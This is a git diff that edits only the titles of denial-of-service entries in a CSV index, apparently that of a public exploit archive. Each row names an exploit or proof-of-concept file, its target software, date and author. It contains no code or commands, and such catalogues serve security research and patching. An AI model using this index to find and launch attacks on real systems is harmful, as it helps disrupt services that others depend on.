diff --git a/files.csv b/files.csv index 3dc5ecde7..e329d3c85 100644 --- a/files.csv +++ b/files.csv @@ -240,7 +240,7 @@ id,file,description,date,author,platform,type,port 1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System 5.0 - (Register Users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 1269,platforms/windows/dos/1269.c,"Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (1)",2005-10-21,anonymous,windows,dos,0 1271,platforms/windows/dos/1271.c,"Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos,0 -1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - HTTP GET Remote Denial of Service",2005-10-27,Expanders,hardware,dos,0 +1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - GET Remote Denial of Service",2005-10-27,Expanders,hardware,dos,0 1276,platforms/windows/dos/1276.html,"Microsoft Internet Explorer 6 - 'mshtmled.dll' Denial of Service",2005-10-28,"Tom Ferris",windows,dos,0 1281,platforms/windows/dos/1281.c,"Battle Carry .005 Socket Termination - Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0 1282,platforms/windows/dos/1282.c,"Blitzkrieg 2 < 1.21 - (Server/Client) Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0 @@ -703,7 +703,7 @@ id,file,description,date,author,platform,type,port 5201,platforms/windows/dos/5201.txt,"Crysis 1.1.1.5879 - Remote Format String Denial of Service (PoC)",2008-02-28,"Long Poke",windows,dos,0 5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 (Neostrada Livebox DSL Router) - Denial of Service",2008-03-01,0in,linux,dos,0 5217,platforms/windows/dos/5217.html,"ICQ Toolbar 2.3 - ActiveX Remote Denial of Service",2008-03-06,spdr,windows,dos,0 -5225,platforms/windows/dos/5225.html,"KingSoft - 'UpdateOcx2.dll' 'SetUninstallName()' Heap Overflow (PoC)",2008-03-10,void,windows,dos,0 +5225,platforms/windows/dos/5225.html,"KingSoft - 'UpdateOcx2.dll SetUninstallName()' Heap Overflow (PoC)",2008-03-10,void,windows,dos,0 5229,platforms/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 5235,platforms/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial of Service",2008-03-11,ryujin,windows,dos,0 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - 'rpc.metad' Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0 @@ -821,12 +821,12 @@ id,file,description,date,author,platform,type,port 6672,platforms/windows/dos/6672.txt,"AyeView 2.20 - Invalid Bitmap Header Parsing Crash",2008-10-05,suN8Hclf,windows,dos,0 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 - '.BMP' Image Crash",2008-10-05,suN8Hclf,windows,dos,0 6689,platforms/linux/dos/6689.txt,"Konqueror 3.5.9 - 'font color' Remote Crash",2008-10-06,"Jeremy Brown",linux,dos,0 -6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 - (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0 +6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 - 'color'/'bgcolor' Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0 6716,platforms/windows/dos/6716.pl,"Microsoft Windows - GDI+ (PoC) (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 -6717,platforms/windows/dos/6717.py,"WinFTP Server 2.3.0 - (PASV mode) Remote Denial of Service",2008-10-09,dmnt,windows,dos,0 -6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - (load) Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0 +6717,platforms/windows/dos/6717.py,"WinFTP Server 2.3.0 - 'PASV Mode' Remote Denial of Service",2008-10-09,dmnt,windows,dos,0 +6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 - 'load' Remote Crash",2008-10-10,"Jeremy Brown",linux,dos,0 6719,platforms/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - 'POP3' Unauthenticated Denial of Service",2008-10-10,rAWjAW,windows,dos,0 -6726,platforms/hardware/dos/6726.txt,"Nokia Mini Map Browser - (array sort) Silent Crash",2008-10-10,ikki,hardware,dos,0 +6726,platforms/hardware/dos/6726.txt,"Nokia Mini Map Browser - 'Array Sort' Silent Crash",2008-10-10,ikki,hardware,dos,0 6732,platforms/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow (PoC) (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0 6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service",2008-10-12,dmnt,windows,dos,0 6741,platforms/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service",2008-10-13,shinnai,windows,dos,0 @@ -1483,7 +1483,7 @@ id,file,description,date,author,platform,type,port 12109,platforms/multiple/dos/12109.txt,"Multiple Vendor 'librpc.dll' Signedness Error - Remote Code Execution",2010-04-08,ZSploit.com,multiple,dos,0 12110,platforms/windows/dos/12110.pl,"CompleteFTP 3.3.0 - Remote Memory Consumption Denial of Service",2010-04-08,"Jonathan Salwan",windows,dos,0 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0 -12154,platforms/php/dos/12154.txt,"vBulletin Cyb - Advanced Forum Statistics - 'misc.php' Denial of Service",2010-04-10,"Andhra Hackers",php,dos,0 +12154,platforms/php/dos/12154.txt,"vBulletin Cyb - Advanced Forum Statistics 'misc.php' Denial of Service",2010-04-10,"Andhra Hackers",php,dos,0 12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption (PoC)",2010-04-11,LiquidWorm,windows,dos,0 12165,platforms/multiple/dos/12165.txt,"PHP 5.3.0 - 'getopt()' Denial of Service",2010-04-12,Napst3r,multiple,dos,0 12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - Format String",2010-04-12,"Alexey Sintsov",multiple,dos,0 @@ -1700,10 +1700,10 @@ id,file,description,date,author,platform,type,port 14866,platforms/novell/dos/14866.txt,"Novell Netware 6.5 - OpenSSH Remote Stack Overflow",2010-09-01,"Francis Provencher",novell,dos,0 14882,platforms/windows/dos/14882.txt,"FFDshow - SEH Exception leading to Null Pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 14883,platforms/windows/dos/14883.txt,"Intel Video Codecs 5.0 - Remote Denial of Service",2010-09-03,"Matthew Bergin",windows,dos,0 -14892,platforms/windows/dos/14892.py,"VideoLAN VLC Media Player < 1.1.4 - '.xspf' 'smb://' URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,windows,dos,0 +14892,platforms/windows/dos/14892.py,"VideoLAN VLC Media Player < 1.1.4 - '.xspf smb://' URI Handling Remote Stack Overflow (PoC)",2010-09-04,s-dz,windows,dos,0 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow (PoC)",2010-09-05,0x6264,linux,dos,0 14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 - Buffer Overflow Crash (SEH) (PoC)",2010-09-05,"Abhishek Lyall",windows,dos,0 -14916,platforms/windows/dos/14916.py,"HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe' 'execvp_nc' Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 +14916,platforms/windows/dos/14916.py,"HP OpenView Network Node Manager (OV NNM) - 'webappmon.exe execvp_nc' Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0 14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos,0 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0 @@ -1725,7 +1725,7 @@ id,file,description,date,author,platform,type,port 15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution",2010-09-18,Abysssec,windows,dos,0 15054,platforms/linux/dos/15054.rb,"RarCrack 0.2 - Buffer Overflow (PoC)",2010-09-19,The_UnKn@wn,linux,dos,0 15061,platforms/windows/dos/15061.txt,"Microsoft DRM Technology - 'msnetobj.dll' ActiveX Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",windows,dos,0 -15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - 'Filename' 'init()' '.bss' (PoC)",2010-09-20,Stoke,linux,dos,0 +15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - 'Filename init() .bss' (PoC)",2010-09-20,Stoke,linux,dos,0 15065,platforms/windows/dos/15065.txt,"Microsoft Excel - WOPT Record Parsing Heap Memory Corruption",2010-09-21,Abysssec,windows,dos,0 15076,platforms/windows/dos/15076.py,"Adobe Shockwave Director tSAC - Chunk Memory Corruption",2010-09-22,Abysssec,windows,dos,0 15112,platforms/windows/dos/15112.py,"Microsoft Cinepak Codec CVDecompress - Heap Overflow (MS10-055)",2010-09-26,Abysssec,windows,dos,0 @@ -1882,7 +1882,7 @@ id,file,description,date,author,platform,type,port 16079,platforms/multiple/dos/16079.html,"Google Chrome 8.0.552.237 - replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",multiple,dos,0 16084,platforms/windows/dos/16084.html,"Maxthon Browser 3.0.20.1000 - ref / replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",windows,dos,0 16095,platforms/linux/dos/16095.pl,"Terminal Server Client - '.rdp' Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0 -16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0 +16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Skinfile (Denial of Service)",2011-02-06,badc0re,windows,dos,0 16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0 16129,platforms/linux/dos/16129.txt,"ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0 @@ -1904,7 +1904,7 @@ id,file,description,date,author,platform,type,port 16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 - Null Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0 16255,platforms/windows/dos/16255.pl,"Magic Music Editor - '.cda' Denial of Service",2011-02-28,AtT4CKxT3rR0r1ST,windows,dos,0 16260,platforms/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,windows,dos,0 -16261,platforms/multiple/dos/16261.txt,"PHP 'Exif' Extension - 'exif_read_data()' Function Remote Denial of Service",2011-02-28,"_ikki and paradoxengine",multiple,dos,0 +16261,platforms/multiple/dos/16261.txt,"PHP 'Exif' Extension - 'exif_read_data()' Remote Denial of Service",2011-02-28,"_ikki and paradoxengine",multiple,dos,0 16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation (PoC) (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0 16263,platforms/linux/dos/16263.c,"Linux Kernel 2.6.37 - Local Kernel Denial of Service (1)",2011-03-02,prdelka,linux,dos,0 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 @@ -1944,7 +1944,7 @@ id,file,description,date,author,platform,type,port 17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer Overflow / Denial of Service",2011-04-01,^Xecuti0N3r,windows,dos,0 17089,platforms/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 - Buffer Overflow / Denial of Service",2011-04-01,^Xecuti0N3r,windows,dos,0 17097,platforms/bsd/dos/17097.c,"IPComp - encapsulation Unauthenticated kernel memory Corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 -17120,platforms/multiple/dos/17120.c,"GNU glibc < 2.12.2 - 'fnmatch()' Function Stack Corruption",2011-02-25,"Simon Berry-Byrne",multiple,dos,0 +17120,platforms/multiple/dos/17120.c,"GNU glibc < 2.12.2 - 'fnmatch()' Stack Corruption",2011-02-25,"Simon Berry-Byrne",multiple,dos,0 17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service",2011-04-08,"Lufeng Li",windows,dos,0 17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M - Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0 17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - '.ICO' With Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos,0 @@ -2149,7 +2149,7 @@ id,file,description,date,author,platform,type,port 18552,platforms/windows/dos/18552.pl,"Passport PC To Host - '.zws' File Memory Corruption",2012-03-03,Silent_Dream,windows,dos,0 18600,platforms/multiple/dos/18600.txt,"presto! pagemanager 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 18601,platforms/multiple/dos/18601.txt,"EMC NetWorker 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos,0 -18579,platforms/linux/dos/18579.txt,"PyPAM - Python bindings for PAM - Double-Free Corruption",2012-03-10,"Markus Vervier",linux,dos,0 +18579,platforms/linux/dos/18579.txt,"PyPAM Python bindings for PAM - Double-Free Corruption",2012-03-10,"Markus Vervier",linux,dos,0 18584,platforms/windows/dos/18584.txt,"GOM Media Player 2.1.37 - Buffer Overflow",2012-03-12,longrifle0x,windows,dos,0 18586,platforms/windows/dos/18586.txt,"XnView FlashPix Image Processing - Heap Overflow",2012-03-12,"Francis Provencher",windows,dos,0 18587,platforms/windows/dos/18587.py,"Network Instrument Observer - SNMP SetRequest Denial of Service",2012-03-12,"Francis Provencher",windows,dos,0 @@ -2157,7 +2157,7 @@ id,file,description,date,author,platform,type,port 18606,platforms/windows/dos/18606.txt,"Microsoft Terminal Services - Use-After-Free (MS12-020)",2012-03-16,"Luigi Auriemma",windows,dos,0 18705,platforms/hardware/dos/18705.txt,"Sony Bravia - Remote Denial of Service",2012-04-05,"Gabriel Menezes Nunes",hardware,dos,0 18628,platforms/windows/dos/18628.py,"PeerFTP Server 4.01 - Remote Crash (PoC)",2012-03-20,localh0t,windows,dos,0 -18629,platforms/windows/dos/18629.py,"Tiny Server 1.1.9 - HTTP HEAD Denial of Service",2012-03-20,"brock haun",windows,dos,0 +18629,platforms/windows/dos/18629.py,"Tiny Server 1.1.9 - HEAD Denial of Service",2012-03-20,"brock haun",windows,dos,0 18630,platforms/android/dos/18630.txt,"Android FTPServer 1.9.0 - Remote Denial of Service",2012-03-20,G13,android,dos,0 18633,platforms/windows/dos/18633.txt,"Adobe Photoshop 12.1 - '.tiff' Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos,0 18636,platforms/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow",2012-03-21,LiquidWorm,windows,dos,0 @@ -2205,7 +2205,7 @@ id,file,description,date,author,platform,type,port 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 -18916,platforms/windows/dos/18916.txt,"Symantec End Point Protection 11.x - & Symantec Network Access Control 11.x - LCE (PoC)",2012-05-23,41.w4r10r,windows,dos,0 +18916,platforms/windows/dos/18916.txt,"Symantec End Point Protection 11.x / Symantec Network Access Control 11.x - Local Code Execution (PoC)",2012-05-23,41.w4r10r,windows,dos,0 18918,platforms/multiple/dos/18918.txt,"Wireshark - DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos,0 18919,platforms/multiple/dos/18919.txt,"Wireshark - Multiple Dissector Denial of Service Vulnerabilities",2012-05-24,"Laurent Butti",multiple,dos,0 18920,platforms/multiple/dos/18920.txt,"Wireshark - Misaligned Memory Denial of Service",2012-05-24,"Klaus Heckelmann",multiple,dos,0 @@ -2562,7 +2562,7 @@ id,file,description,date,author,platform,type,port 20989,platforms/windows/dos/20989.txt,"Microsoft IIS 4.0/5.0 - Device File Local Denial of Service",2001-07-04,VIPER_SV,windows,dos,0 20991,platforms/windows/dos/20991.txt,"Microsoft IIS 4.0/5.0 - Device File Remote Denial of Service",2001-07-04,VIPER_SV,windows,dos,0 20997,platforms/multiple/dos/20997.c,"HP-UX 11 / Linux Kernel 2.4 / Windows 2000/NT 4.0 / IRIX 6.5 - Small TCP MSS Denial of Service",2001-07-07,"Darren Reed",multiple,dos,0 -21006,platforms/windows/dos/21006.txt,"MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2/5.2.1 - File Scanner Malicious Archive Denial of Service",2001-07-12,"Michel Arboi",windows,dos,0 +21006,platforms/windows/dos/21006.txt,"MAILsweeper SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2/5.2.1 - File Scanner Malicious Archive Denial of Service",2001-07-12,"Michel Arboi",windows,dos,0 21012,platforms/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service",2001-07-17,"Andy Gavin",multiple,dos,0 40421,platforms/multiple/dos/40421.txt,"Adobe Flash - Crash When Freeing Memory After AVC decoding",2016-09-23,"Google Security Research",multiple,dos,0 21016,platforms/windows/dos/21016.c,"ID Software Quake 3 - 'SMURF' Denial of Service",2001-07-17,"Andy Gavin",windows,dos,0 @@ -2700,7 +2700,7 @@ id,file,description,date,author,platform,type,port 21821,platforms/windows/dos/21821.c,"Trillian 0.74 - IRC PART Message Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21823,platforms/windows/dos/21823.c,"Trillian 0.74 - IRC Oversized Data Block Buffer Overflow",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21824,platforms/windows/dos/21824.pl,"Arctic Torrent 1.2.3 - Memory Corruption (Denial of Service)",2012-10-09,"Jean Pascal Pereira",windows,dos,0 -21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition -Buffer Overflow (SEH) (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0 +21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition - Buffer Overflow (SEH) (PoC)",2012-10-09,Dark-Puzzle,windows,dos,0 21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch - Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos,0 21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' Null Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 - Oversized STDERR Buffer Denial of Service",2002-09-24,"K.C. Wong",linux,dos,0 @@ -2710,7 +2710,7 @@ id,file,description,date,author,platform,type,port 21909,platforms/windows/dos/21909.txt,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (3)",2002-10-05,p0pt4rtz,windows,dos,0 21911,platforms/multiple/dos/21911.txt,"Oracle 9i Application Server 9.0.2 Web Cache Administration Tool - Denial of Service",2002-10-06,@stake,multiple,dos,0 21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block Denial of Service",2002-10-08,"Yiming Gong",windows,dos,0 -33403,platforms/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow",2009-12-14,"Ruben Santamarta",windows,dos,0 +33403,platforms/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Remote Stack Buffer Overflow",2009-12-14,"Ruben Santamarta",windows,dos,0 21935,platforms/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 - GET Denial of Service",2002-10-12,"Marc Ruef",windows,dos,0 21938,platforms/windows/dos/21938.txt,"TelCondex SimpleWebserver 2.0.6 - Denial of Service",2002-10-15,"Marc Ruef",windows,dos,0 21939,platforms/hardware/dos/21939.txt,"Polycom ViaVideo 2.2/3.0 - Denial of Service",2002-10-15,prophecy.net.nz,hardware,dos,0 @@ -2883,8 +2883,8 @@ id,file,description,date,author,platform,type,port 40411,platforms/windows/dos/40411.txt,"JCraft/JSch Java Secure Channel 0.1.53 - Recursive sftp-get Directory Traversal",2016-09-22,tintinweb,windows,dos,0 22690,platforms/windows/dos/22690.c,"Activity Monitor 2002 2.6 - Remote Denial of Service",2003-05-29,"Luca Ercoli",windows,dos,0 22694,platforms/windows/dos/22694.c,"Desktop Orbiter 2.0 1 - Resource Exhaustion (Denial of Service)",2003-05-30,"Luca Ercoli",windows,dos,0 -22700,platforms/linux/dos/22700.c,"MyServer 0.4.3 - HTTP GET Argument Buffer Overflow",2003-09-08,badpack3t,linux,dos,0 -22701,platforms/linux/dos/22701.c,"MyServer 0.5 - HTTP GET Argument Buffer Overflow",2003-09-08,badpack3t,linux,dos,0 +22700,platforms/linux/dos/22700.c,"MyServer 0.4.3 - GET Argument Buffer Overflow",2003-09-08,badpack3t,linux,dos,0 +22701,platforms/linux/dos/22701.c,"MyServer 0.5 - GET Argument Buffer Overflow",2003-09-08,badpack3t,linux,dos,0 22706,platforms/windows/dos/22706.asm,"Crob FTP Server 2.50.4 - Remote 'Username' Format String",2003-06-02,"Luca Ercoli",windows,dos,0 22707,platforms/windows/dos/22707.txt,"Novell Groupwise Internet Agent - LDAP BIND Request Overflow",2012-11-14,"Francis Provencher",windows,dos,0 22718,platforms/windows/dos/22718.c,"Pi3Web 2.0.2 - SortName Buffer Overflow",2003-06-02,posidron,windows,dos,0 @@ -2931,7 +2931,7 @@ id,file,description,date,author,platform,type,port 22950,platforms/hardware/dos/22950.txt,"Xavi X7028r DSL Router - UPNP Long Request Denial of Service",2003-07-23,"David F. Madrid",hardware,dos,0 22952,platforms/linux/dos/22952.txt,"xfstt 1.2/1.4 - Unspecified Memory Disclosure",2003-07-23,V9,linux,dos,0 22957,platforms/windows/dos/22957.cpp,"Microsoft SQL Server 7.0/2000 / MSDE - Named Pipe Denial of Service (MS03-031)",2003-07-23,refdom,windows,dos,0 -22962,platforms/hardware/dos/22962.pl,"Cisco Aironet AP1x00 - Malformed HTTP GET Denial of Service",2003-07-28,blackangels,hardware,dos,0 +22962,platforms/hardware/dos/22962.pl,"Cisco Aironet AP1x00 - GET Denial of Service",2003-07-28,blackangels,hardware,dos,0 22918,platforms/unix/dos/22918.txt,"IBM U2 UniVerse 10.0.0.9 - uvrestore Buffer Overflow",2003-07-16,kf,unix,dos,0 22920,platforms/unix/dos/22920.txt,"IBM U2 UniVerse 10.0.0.9 - UVADMSH Buffer Overflow",2003-07-16,kf,unix,dos,0 22926,platforms/multiple/dos/22926.txt,"Witango Server 5.0.1.061 - Remote Cookie Buffer Overflow",2003-07-18,"Next Generation Software",multiple,dos,0 @@ -3068,7 +3068,7 @@ id,file,description,date,author,platform,type,port 23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23574,platforms/windows/dos/23574.txt,"FireFly Mediaserver 1.0.0.1359 - Null Pointer Dereference",2012-12-21,"High-Tech Bridge SA",windows,dos,0 -23584,platforms/windows/dos/23584.c,"McAfee ePolicy Orchestrator 1.x/2.x/3.0 - Agent HTTP POST Buffer Mismanagement",2004-01-22,cyber_flash,windows,dos,0 +23584,platforms/windows/dos/23584.c,"McAfee ePolicy Orchestrator 1.x/2.x/3.0 Agent - POST Buffer Mismanagement",2004-01-22,cyber_flash,windows,dos,0 23590,platforms/multiple/dos/23590.txt,"Reptile Web Server Reptile Web Server 20020105 - Denial of Service",2004-01-23,"Donato Ferrante",multiple,dos,0 23595,platforms/windows/dos/23595.txt,"TinyServer 1.1 - Denial of Service",2004-01-24,"Donato Ferrante",windows,dos,0 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 - DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",windows,dos,0 @@ -3171,9 +3171,9 @@ id,file,description,date,author,platform,type,port 24142,platforms/windows/dos/24142.pl,"Mollensoft Lightweight FTP Server 3.6 - Remote Denial of Service",2004-05-24,storm,windows,dos,0 24143,platforms/hardware/dos/24143.c,"VocalTec VGW120/VGW480 Telephony Gateway Remote H.225 - Denial of Service",2004-05-24,Alexander,hardware,dos,0 24144,platforms/windows/dos/24144.txt,"MiniShare Server 1.3.2 - Remote Denial of Service",2004-05-26,"Donato Ferrante",windows,dos,0 -24145,platforms/windows/dos/24145.c,"Orenosv HTTP/FTP Server 0.5.9 - HTTP GET Denial of Service (1)",2004-05-25,badpack3t,windows,dos,0 -24146,platforms/windows/dos/24146.bat,"Orenosv HTTP/FTP Server 0.5.9 - HTTP GET Denial of Service (2)",2004-06-02,CoolICE,windows,dos,0 -24147,platforms/windows/dos/24147.bat,"Orenosv HTTP/FTP Server 0.5.9 - HTTP GET Denial of Service (3)",2004-06-02,CoolICE,windows,dos,0 +24145,platforms/windows/dos/24145.c,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (1)",2004-05-25,badpack3t,windows,dos,0 +24146,platforms/windows/dos/24146.bat,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (2)",2004-06-02,CoolICE,windows,dos,0 +24147,platforms/windows/dos/24147.bat,"Orenosv HTTP/FTP Server 0.5.9 - GET Denial of Service (3)",2004-06-02,CoolICE,windows,dos,0 24150,platforms/windows/dos/24150.pl,"Mollensoft Lightweight FTP Server 3.6 - Remote Buffer Overflow",2004-05-28,"Chintan Trivedi",windows,dos,0 40399,platforms/windows/dos/40399.txt,"VMware Workstation - 'vprintproxy.exe' JPEG2000 Images Multiple Memory Corruptions",2016-09-19,"Google Security Research",windows,dos,0 24170,platforms/multiple/dos/24170.txt,"Colin McRae Rally 2004 - Multiplayer Denial of Service",2004-06-04,"Luigi Auriemma",multiple,dos,0 @@ -3192,7 +3192,7 @@ id,file,description,date,author,platform,type,port 24267,platforms/windows/dos/24267.txt,"Microsoft Internet Explorer 6 - JavaScript Null Pointer Exception Denial of Service",2004-07-12,"Berend-Jan Wever",windows,dos,0 24275,platforms/unix/dos/24275.txt,"IBM Lotus Notes 6.0/6.5 - Multiple Java Applet Vulnerabilities",2004-07-13,"Jouko Pynnonen",unix,dos,0 24281,platforms/windows/dos/24281.pl,"Microsoft Systems Management Server 1.2/2.0 - Remote Denial of Service",2004-07-14,HexView,windows,dos,0 -24282,platforms/multiple/dos/24282.txt,"Gattaca Server 2003 - 'web.tmpl' 'Language' Parameter CPU Consumption (Denial of Service)",2004-07-15,dr_insane,multiple,dos,0 +24282,platforms/multiple/dos/24282.txt,"Gattaca Server 2003 - 'web.tmpl Language' Parameter CPU Consumption (Denial of Service)",2004-07-15,dr_insane,multiple,dos,0 24283,platforms/multiple/dos/24283.txt,"Gattaca Server 2003 POP3 - Denial of Service",2004-07-15,dr_insane,multiple,dos,0 24288,platforms/windows/dos/24288.txt,"Symantec Norton AntiVirus 2001/2002/2003/2004 - Script Blocker Denial of Service",2004-07-16,vozzie,windows,dos,0 40398,platforms/windows/dos/40398.txt,"VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow",2016-09-19,"Google Security Research",windows,dos,0 @@ -3239,7 +3239,7 @@ id,file,description,date,author,platform,type,port 24596,platforms/unix/dos/24596.txt,"QNX Photon pkg-installer - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 24597,platforms/multiple/dos/24597.txt,"Mozilla Browser 1.7.x - Non-ASCII Hostname Heap Overflow",2004-09-14,"Mats Palmgren and Gael Delalleau",multiple,dos,0 24599,platforms/linux/dos/24599.txt,"CUPS 1.1.x - UDP Packet Remote Denial of Service",2004-09-15,"Alvaro Martinez Echevarria",linux,dos,0 -24605,platforms/windows/dos/24605.txt,"Microsoft Windows XP - 'explorer.exe' '.tiff' Image Denial of Service",2004-09-16,"Jason Summers",windows,dos,0 +24605,platforms/windows/dos/24605.txt,"Microsoft Windows XP - 'explorer.exe .tiff' Image Denial of Service",2004-09-16,"Jason Summers",windows,dos,0 24610,platforms/multiple/dos/24610.txt,"DNS4Me 3.0 - Denial of Service / Cross-Site Scripting",2004-09-17,"James Bercegay",multiple,dos,0 24618,platforms/windows/dos/24618.c,"Impressions Games Lords of the Realm III - Nickname Remote Denial of Service",2004-09-20,"Luigi Auriemma",windows,dos,0 